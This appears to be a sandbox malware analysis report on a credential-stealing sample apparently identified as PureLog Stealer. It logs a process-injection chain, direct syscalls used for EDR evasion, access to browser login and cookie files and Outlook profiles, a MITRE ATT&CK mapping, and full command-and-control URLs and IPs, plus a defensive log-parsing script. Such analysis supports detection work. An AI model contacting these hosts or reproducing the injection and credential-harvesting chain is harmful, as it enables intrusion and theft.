Source: C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe | NtDeviceIoControlFile: Direct from: 0x77462AEC
Source: C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe | NtOpenSection: Direct from: 0x77462E0C
Source: C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe | NtCreateFile: Direct from: 0x77462FEC
Source: C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe | NtOpenFile: Direct from: 0x77462DCC
Source: C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe | NtQueryInformationToken: Direct from: 0x77462CAC
Source: C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe | NtTerminateThread: Direct from: 0x77462FCC
Source: C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe | NtAllocateVirtualMemory: Direct from: 0x77462BEC
Source: C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe | NtOpenKeyEx: Direct from: 0x77462B9C
Source: C:\Users\user\Desktop\file.exe | Memory written: C:\Users\user\Desktop\file.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\file.exe | Section loaded: NULL target: C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe protection: execute and read and write
Source: C:\Users\user\Desktop\file.exe | Section loaded: NULL target: C:\Windows\SysWOW64\find.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\find.exe | Section loaded: NULL target: C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe protection: read write
Source: C:\Windows\SysWOW64\find.exe | Section loaded: NULL target: C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\find.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
Source: C:\Windows\SysWOW64\find.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\find.exe | Thread register set: target process: 3040
Source: C:\Windows\SysWOW64\find.exe | Thread APC queued: target process: C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe | Process created: C:\Windows\SysWOW64\find.exe "C:\Windows\SysWOW64\find.exe"
Source: C:\Windows\SysWOW64\find.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: YpbicUfTwt.exe, 00000004.00000002.3863374097.0000000001711000.00000002.00000001.00040000.00000000.sdmp, YpbicUfTwt.exe, 00000004.00000000.1493657431.0000000001711000.00000002.00000001.00040000.00000000.sdmp, YpbicUfTwt.exe, 00000007.00000002.3863464890.0000000001A91000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
Source: YpbicUfTwt.exe, 00000004.00000002.3863374097.0000000001711000.00000002.00000001.00040000.00000000.sdmp, YpbicUfTwt.exe, 00000004.00000000.1493657431.0000000001711000.00000002.00000001.00040000.00000000.sdmp, YpbicUfTwt.exe, 00000007.00000002.3863464890.0000000001A91000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
Source: YpbicUfTwt.exe, 00000004.00000002.3863374097.0000000001711000.00000002.00000001.00040000.00000000.sdmp, YpbicUfTwt.exe, 00000004.00000000.1493657431.0000000001711000.00000002.00000001.00040000.00000000.sdmp, YpbicUfTwt.exe, 00000007.00000002.3863464890.0000000001A91000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: 0Program Manager
Source: YpbicUfTwt.exe, 00000004.00000002.3863374097.0000000001711000.00000002.00000001.00040000.00000000.sdmp, YpbicUfTwt.exe, 00000004.00000000.1493657431.0000000001711000.00000002.00000001.00040000.00000000.sdmp, YpbicUfTwt.exe, 00000007.00000002.3863464890.0000000001A91000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\Users\user\Desktop\file.exe VolumeInformation
Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
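The evasion evidence in this section comes in three kinds of entry: Nt* calls that the sandbox flags as issued directly (with the address it attributes the call to), sections mapped into another process with a given protection, and process creations. Read together they describe the chain file.exe -> YpbicUfTwt.exe -> find.exe -> firefox.exe with executable sections mapped at each hop. The following is an added example, not Joe Sandbox code and not part of the original report: it parses a subset of these entries (copied from the report, normalised to "Source: <process> | <signature>: <detail>"), counts the direct syscalls per API, and lists the cross-process executable mappings and parent/child pairs. The set of "injection primitive" APIs is my own triage heuristic, not something the report states.

```python
"""Summary of the HIPS / evasion evidence above: direct Nt* calls, process
creation and cross-process section mapping.

Added example for this report page, not Joe Sandbox tooling.  The sample lines
are a subset of the report's entries, normalised to
'Source: <process> | <signature>: <detail>'; INJECTION_PRIMITIVES is my own
triage heuristic, not a list the report provides.
"""
import re
import ntpath
from collections import Counter, defaultdict

INJ = (r"C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx"
       r"\YpbicUfTwt.exe")
FILE = r"C:\Users\user\Desktop\file.exe"
FIND = r"C:\Windows\SysWOW64\find.exe"
FFOX = r"C:\Program Files\Mozilla Firefox\firefox.exe"

# Constructed sample: entries taken from the report above.
SAMPLE_LINES = [
    f"Source: {INJ} | NtCreateMutant: Direct from: 0x774635CC",
    f"Source: {INJ} | NtWriteVirtualMemory: Direct from: 0x77462E3C",
    f"Source: {INJ} | NtMapViewOfSection: Direct from: 0x77462D1C",
    f"Source: {INJ} | NtResumeThread: Direct from: 0x774636AC",
    f"Source: {INJ} | NtProtectVirtualMemory: Direct from: 0x77462F9C",
    f"Source: {INJ} | NtAllocateVirtualMemory: Direct from: 0x77462BFC",
    f"Source: {INJ} | NtAllocateVirtualMemory: Direct from: 0x77463C9C",
    f"Source: {INJ} | NtCreateUserProcess: Direct from: 0x7746371C",
    f"Source: {INJ} | NtWriteVirtualMemory: Direct from: 0x7746490C",
    f"Source: {INJ} | NtAllocateVirtualMemory: Direct from: 0x774648EC",
    f"Source: {INJ} | NtResumeThread: Direct from: 0x77462FBC",
    f'Source: {FILE} | Process created: {FILE} "{FILE}"',
    f'Source: {INJ} | Process created: {FIND} "{FIND}"',
    f'Source: {FIND} | Process created: {FFOX} "C:\\Program Files\\Mozilla Firefox\\Firefox.exe"',
    f"Source: {FILE} | Section loaded: NULL target: {INJ} protection: execute and read and write",
    f"Source: {FILE} | Section loaded: NULL target: {FIND} protection: execute and read and write",
    f"Source: {FIND} | Section loaded: NULL target: {INJ} protection: read write",
    f"Source: {FIND} | Section loaded: NULL target: {FFOX} protection: execute and read and write",
]

# The patterns also accept the raw HTML-to-text form, where the source path
# runs straight into the signature name and a "Jump to behavior" link trails.
SRC = r"^Source:\s*(?P<src>.+?)\s*\|?\s*"
TAIL = r"(?:Jump to behavior)?\s*$"
SYSCALL_RE = re.compile(SRC + r"(?P<api>Nt\w+):\s*Direct from:\s*(?P<addr>0x[0-9A-Fa-f]+)" + TAIL)
PROC_RE = re.compile(SRC + r"Process created:\s*(?P<child>.+?\.exe)\s+\"")
SECT_RE = re.compile(SRC + r"Section loaded: NULL target:\s*(?P<target>.+?)\s+protection:\s*(?P<prot>.+?)" + TAIL)

# Nt* calls that together make up a classic write-then-execute injection.
INJECTION_PRIMITIVES = {
    "NtAllocateVirtualMemory", "NtWriteVirtualMemory", "NtProtectVirtualMemory",
    "NtMapViewOfSection", "NtCreateUserProcess", "NtResumeThread",
    "NtSetContextThread", "NtQueueApcThread",
}

def parse(lines):
    """Split the evidence into direct syscalls, process creations and section maps."""
    syscalls, origins = Counter(), defaultdict(set)
    procs, sections = [], []
    for line in lines:
        line = line.strip()
        if m := SYSCALL_RE.match(line):
            syscalls[m["api"]] += 1
            origins[m["api"]].add(int(m["addr"], 16))
        elif m := PROC_RE.match(line):
            procs.append((ntpath.basename(m["src"]), ntpath.basename(m["child"])))
        elif m := SECT_RE.match(line):
            sections.append((ntpath.basename(m["src"]), ntpath.basename(m["target"]), m["prot"]))
    return syscalls, dict(origins), procs, sections

def injection_primitives(syscalls):
    """Direct-call primitives seen, sorted; several together are the strong signal."""
    return sorted(api for api in syscalls if api in INJECTION_PRIMITIVES)

def executable_mappings(sections):
    """(source, target) pairs where a section was mapped executable into another process."""
    return [(src, tgt) for src, tgt, prot in sections if "execute" in prot]

if __name__ == "__main__":
    syscalls, origins, procs, sections = parse(SAMPLE_LINES)
    for api, n in syscalls.most_common():
        addrs = ", ".join(hex(a) for a in sorted(origins[api]))
        print(f"{api:28} x{n}  from {addrs}")
    print("injection primitives:", injection_primitives(syscalls))
    print("process creations:", procs)
    print("executable mappings:", executable_mappings(sections))
```

Any single direct Nt* call is weak evidence on its own; allocate, write, protect, map and resume all issued directly from one process, with executable sections landing in two other processes, is the combination worth a detection.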

Stealing of Sensitive Information

                      Source: Yara matchFile source: 3.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.file.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000005.00000002.3854649027.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.1566774721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.3864375083.0000000000CD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.3857227824.00000000009B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.1567443784.0000000000E50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.3863738708.0000000002D10000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.1572202797.0000000001360000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0.2.file.exe.7200000.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.file.exe.7200000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.file.exe.3e39970.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.1420015259.0000000007200000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1417267830.0000000003E39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: C:\Windows\SysWOW64\find.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\SysWOW64\find.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                      Source: C:\Windows\SysWOW64\find.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                      Source: C:\Windows\SysWOW64\find.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                      Source: C:\Windows\SysWOW64\find.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                      Source: C:\Windows\SysWOW64\find.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                      Source: C:\Windows\SysWOW64\find.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\SysWOW64\find.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                      Source: C:\Windows\SysWOW64\find.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

                      Remote Access Functionality

Source: Yara match | File source: 3.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000005.00000002.3854649027.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.1566774721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.3864375083.0000000000CD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.3857227824.00000000009B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.1567443784.0000000000E50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.3863738708.0000000002D10000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.1572202797.0000000001360000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0.2.file.exe.7200000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.file.exe.7200000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.file.exe.3e39970.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.1420015259.0000000007200000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1417267830.0000000003E39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

MITRE ATT&CK Matrix

Techniques listed per tactic column; the number in parentheses is the count shown beside the technique in the report's matrix.

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: Windows Management Instrumentation; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Privilege Escalation: Process Injection (412); Abuse Elevation Control Mechanism (1); DLL Side-Loading (1); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Defense Evasion: Masquerading (1); Disable or Modify Tools (1); Virtualization/Sandbox Evasion (41); Process Injection (412); Deobfuscate/Decode Files or Information (1); Abuse Elevation Control Mechanism (1); Obfuscated Files or Information (4); Software Packing (22); DLL Side-Loading (1)
Credential Access: OS Credential Dumping (1); LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: Security Software Discovery (121); Process Discovery (2); Virtualization/Sandbox Evasion (41); Application Window Discovery (1); File and Directory Discovery (2); System Information Discovery (113); Remote System Discovery; System Owner/User Discovery; Network Sniffing
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
Collection: Email Collection (1); Archive Collected Data (1); Data from Local System (1); Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
Command and Control: Encrypted Channel (1); Ingress Tool Transfer (3); Non-Application Layer Protocol (4); Application Layer Protocol (4); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
Behavior Graph ID: 1562914 | Sample: file.exe | Startdate: 26/11/2024 | Architecture: WINDOWS | Score: 100

Start node (2):
  DNS/IP: www.tageting.shop; www.ssps.shop; 15 other IPs or domains
  Signatures: Suricata IDS alerts for network traffic; Multi AV Scanner detection for submitted file; Yara detected PureLog Stealer; 6 other signatures
  Started: file.exe (node 10)

file.exe 3 (node 10):
  Dropped: C:\Users\user\AppData\Local\...\file.exe.log, ASCII
  Signatures: Injects a PE file into a foreign processes
  Started: file.exe (node 14)

file.exe (node 14):
  Signatures: Maps a DLL or memory area into another process
  Injected: YpbicUfTwt.exe (node 17)

YpbicUfTwt.exe (node 17):
  Signatures: Found direct / indirect Syscall (likely to bypass EDR)
  Started: find.exe 13 (node 20)

find.exe 13 (node 20):
  Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures
  Injected: YpbicUfTwt.exe (node 23)
  Started: firefox.exe (node 27)

YpbicUfTwt.exe (node 23):
  DNS/IP: dojodigitize.shop 15.197.142.173, ports 49712, 80, TANDEMUS, United States; 0be.info 173.0.157.187, ports 49722, 49723, 49724, SERVERS-COMUS, United States; 9 other IPs or domains
  Signatures: Found direct / indirect Syscall (likely to bypass EDR)

Source | Detection | Scanner | Label | Link
file.exe | 34% | ReversingLabs | ByteCode-MSIL.Trojan.Leonem | -
file.exe | 100% | Joe Sandbox ML | - | -
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label | Link
http://www.qqc5.top/fqrq/?ynlT=Y0cHWYGzbrmggkpYjpxtSdMxfMP0Smiz5SpuxjzPWz583Z1p+HcVA7FQEFnwJzFb+2T9MdMSTUdI8uj8DHEKh8s29K102qUBTE3lZDmg/9I7wbokssp0voIrvrAUc2Osrw==&BZcp=FxLxsNCx3xt | 0% | Avira URL Cloud | safe | -
http://www.ssps.shop/r99d/ | 0% | Avira URL Cloud | safe | -
http://www.tageting.shop/x43r/ | 0% | Avira URL Cloud | safe | -
http://www.fengzheng.shop/plc2/?ynlT=sjJIcM7rXxnPrFlvc0dBoChSE+wOUJkO2uhZ3WrFd6iw+5UGAWLmyTv1SrcKmKBFl4Y89PiFDrVpBQFB+L6IBQWFy+wjnVcK8AF+QDRLSO2OD8bfVRVlBcPU0ek8UWp3Qg==&BZcp=FxLxsNCx3xt | 0% | Avira URL Cloud | safe | -
http://www.gupiao.bet/t3a1/ | 0% | Avira URL Cloud | safe | -
http://www.fengzheng.shop | 0% | Avira URL Cloud | safe | -
http://www.tageting.shop/x43r/?BZcp=FxLxsNCx3xt&ynlT=g227vAVjmek7Ve3OhSfqnYrPqVj7dvzdLiIhaitLUQPOyze4NP6q28gxignii/rObVyldh0Z2JuPzDHM7nQjiG1l2MLTtuTBkMOIHhIRbjJQu6+Ns/S/DI47tn6Dt4shhg== | 0% | Avira URL Cloud | safe | -
http://www.regislemberthe.online/px.js?ch=2 | 0% | Avira URL Cloud | safe | -
http://www.0be.info/5m3m/ | 0% | Avira URL Cloud | safe | -
http://www.qqc5.top/fqrq/ | 0% | Avira URL Cloud | safe | -
http://www.regislemberthe.online/1y0g/?BZcp=FxLxsNCx3xt&ynlT=IEuRIrUs/61ernzQacDnFDSOdtOPzcO3DCiGM7fBggrgjt9jf+N1tpys90b5qRt+HznRgPSmLqw7b0RWB/MNecVj6cupfpeXLidzN4OT675FT0gUTBFuY+WN75tNw87LNQ== | 0% | Avira URL Cloud | safe | -
http://www.regislemberthe.online/sk-logabpstatus.php?a=alFjTmVnTnFFNS9SV3Y0RDlHR3BoMWZmc2gvcGRoa1Fye | 0% | Avira URL Cloud | safe | -
http://www.hasan.cloud/ve8l/?BZcp=FxLxsNCx3xt&ynlT=2CD4NCzEaM98tRH2NSLAESNB0KJGqITNZhOfTEabPOsm5z4GKvQfPi2Ic9iPSKmuH0LkAH7bJGGmIcrctbsX21XyN7dSlYagiwJlQTi+mtxAaezlBuk4gZte6sxMNB2v+Q== | 0% | Avira URL Cloud | safe | -
http://www.regislemberthe.online/px.js?ch=1 | 0% | Avira URL Cloud | safe | -
http://www.learnnow.info/6npp/ | 0% | Avira URL Cloud | safe | -
http://www.0be.info/5m3m/?ynlT=sewIB7u3B3NHgPpZQtRvAC2dQwElouqr2ssF1/N7S59PV2pKHs5HlxSNSrXn1+DkcB7Gvkqs+bGSNPZzMS9ekxejaqvXrk67j38PQRuymLw6FTWN0hL2AlWAmiNidTQMGA==&BZcp=FxLxsNCx3xt | 0% | Avira URL Cloud | safe | -
http://www.dojodigitize.shop/zxe0/?ynlT=El+NSyicP5BK/60EXWXaz7evSHJwK2e1F+D0aleaH+wp2K9lM+jEhQu4F5Y51N1X01h2I0uJ1YrEHciK2w5TkBnZYNNwJ4YcRegv3/W3TWhCxoQqPNBROUFaIQ8+8cz4+g==&BZcp=FxLxsNCx3xt | 0% | Avira URL Cloud | safe | -
http://www.masterqq.pro/vfw3/ | 0% | Avira URL Cloud | safe | -
http://www.regislemberthe.online/1y0g/ | 0% | Avira URL Cloud | safe | -
http://www.learnnow.info/6npp/?ynlT=jlm9uKJBzKMSKltuZ8hnGP24BGKDKPXveDKXZTqGsHNtP0MrAi/8oe7gvYTD+ahEZPaxXoJGvNi0UKW4HyzdiXWiw3/my+fKayPUfiCFUifSzt7jgsgTxNAwRGE5teyGFg==&BZcp=FxLxsNCx3xt | 0% | Avira URL Cloud | safe | -
http://www.hasan.cloud/ve8l/ | 0% | Avira URL Cloud | safe | -
http://www.fengzheng.shop/plc2/ | 0% | Avira URL Cloud | safe | -
http://www.goldbracelet.top/eln6/?ynlT=dR5Y3aKNW3l55kULB1rxeiPlAcv1NFYB73Jn5o4FF8VATzcLQGkwEffEVFziLlDWg39FgTTosOgM31CCD8Gpd9wAhADTehU2x1Z0W7eNB4qt+OY8C4hNNFAeSI1HhK3X2w==&BZcp=FxLxsNCx3xt | 0% | Avira URL Cloud | safe | -
http://www.ssps.shop/r99d/?ynlT=ksK/jUMQwoE3w4qE/G/QpncBqYFbE8pmojthsfhnWNNbCeiLSUgY3hP8WR6lQk2TH0Mmbs+eW9ZNK4MyNm4iduIg7f9mhgZE4uc2OAykkUS/1hIqxxaY527NhMhRLm7btA==&BZcp=FxLxsNCx3xt | 0% | Avira URL Cloud | safe | -
http://www.goldbracelet.top/eln6/ | 0% | Avira URL Cloud | safe | -
http://www.masterqq.pro/vfw3/?ynlT=rqg4sojPN1HzbyOgPnJNE4SyCm0Y3+McauZgTy6bg/7NgADr7OmLN934TwPzSFzjuedcHscZgYNpl4RBVJqUXfpXxUIp7SdBR5fyivcNmDQrGMikN20eFfd6B8gSgv5TSw==&BZcp=FxLxsNCx3xt | 0% | Avira URL Cloud | safe | -
Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.tageting.shop | 13.227.8.45 | true | true | - | unknown
www.masterqq.pro | 172.67.213.249 | true | true | - | unknown
www.goldbracelet.top | 104.21.36.239 | true | true | - | unknown
www.gupiao.bet | 13.248.169.48 | true | true | - | unknown
0be.info | 173.0.157.187 | true | true | - | unknown
www.regislemberthe.online | 208.91.197.27 | true | true | - | unknown
www.learnnow.info | 199.192.23.123 | true | true | - | unknown
qqc5.top | 38.47.233.4 | true | true | - | unknown
dojodigitize.shop | 15.197.142.173 | true | true | - | unknown
www.honk.city | 199.59.243.227 | true | true | - | unknown
www.ssps.shop | 13.248.169.48 | true | true | - | unknown
www.hasan.cloud | 13.248.169.48 | true | true | - | unknown
www.fengzheng.shop | 185.26.237.170 | true | true | - | unknown
www.0be.info | unknown | unknown | false | - | unknown
www.ulojenukw.shop | unknown | unknown | false | - | unknown
www.dojodigitize.shop | unknown | unknown | false | - | unknown
www.qqc5.top | unknown | unknown | false | - | unknown
Name | Malicious | Antivirus Detection | Reputation
http://www.qqc5.top/fqrq/?ynlT=Y0cHWYGzbrmggkpYjpxtSdMxfMP0Smiz5SpuxjzPWz583Z1p+HcVA7FQEFnwJzFb+2T9MdMSTUdI8uj8DHEKh8s29K102qUBTE3lZDmg/9I7wbokssp0voIrvrAUc2Osrw==&BZcp=FxLxsNCx3xt | true | Avira URL Cloud: safe | unknown
http://www.gupiao.bet/t3a1/ | true | Avira URL Cloud: safe | unknown
http://www.tageting.shop/x43r/ | true | Avira URL Cloud: safe | unknown
http://www.ssps.shop/r99d/ | true | Avira URL Cloud: safe | unknown
http://www.0be.info/5m3m/ | true | Avira URL Cloud: safe | unknown
http://www.fengzheng.shop/plc2/?ynlT=sjJIcM7rXxnPrFlvc0dBoChSE+wOUJkO2uhZ3WrFd6iw+5UGAWLmyTv1SrcKmKBFl4Y89PiFDrVpBQFB+L6IBQWFy+wjnVcK8AF+QDRLSO2OD8bfVRVlBcPU0ek8UWp3Qg==&BZcp=FxLxsNCx3xt | true | Avira URL Cloud: safe | unknown
http://www.qqc5.top/fqrq/ | true | Avira URL Cloud: safe | unknown
http://www.tageting.shop/x43r/?BZcp=FxLxsNCx3xt&ynlT=g227vAVjmek7Ve3OhSfqnYrPqVj7dvzdLiIhaitLUQPOyze4NP6q28gxignii/rObVyldh0Z2JuPzDHM7nQjiG1l2MLTtuTBkMOIHhIRbjJQu6+Ns/S/DI47tn6Dt4shhg== | true | Avira URL Cloud: safe | unknown
http://www.regislemberthe.online/1y0g/?BZcp=FxLxsNCx3xt&ynlT=IEuRIrUs/61ernzQacDnFDSOdtOPzcO3DCiGM7fBggrgjt9jf+N1tpys90b5qRt+HznRgPSmLqw7b0RWB/MNecVj6cupfpeXLidzN4OT675FT0gUTBFuY+WN75tNw87LNQ== | true | Avira URL Cloud: safe | unknown
http://www.learnnow.info/6npp/ | true | Avira URL Cloud: safe | unknown
http://www.hasan.cloud/ve8l/?BZcp=FxLxsNCx3xt&ynlT=2CD4NCzEaM98tRH2NSLAESNB0KJGqITNZhOfTEabPOsm5z4GKvQfPi2Ic9iPSKmuH0LkAH7bJGGmIcrctbsX21XyN7dSlYagiwJlQTi+mtxAaezlBuk4gZte6sxMNB2v+Q== | true | Avira URL Cloud: safe | unknown
http://www.0be.info/5m3m/?ynlT=sewIB7u3B3NHgPpZQtRvAC2dQwElouqr2ssF1/N7S59PV2pKHs5HlxSNSrXn1+DkcB7Gvkqs+bGSNPZzMS9ekxejaqvXrk67j38PQRuymLw6FTWN0hL2AlWAmiNidTQMGA==&BZcp=FxLxsNCx3xt | true | Avira URL Cloud: safe | unknown
http://www.regislemberthe.online/1y0g/ | true | Avira URL Cloud: safe | unknown
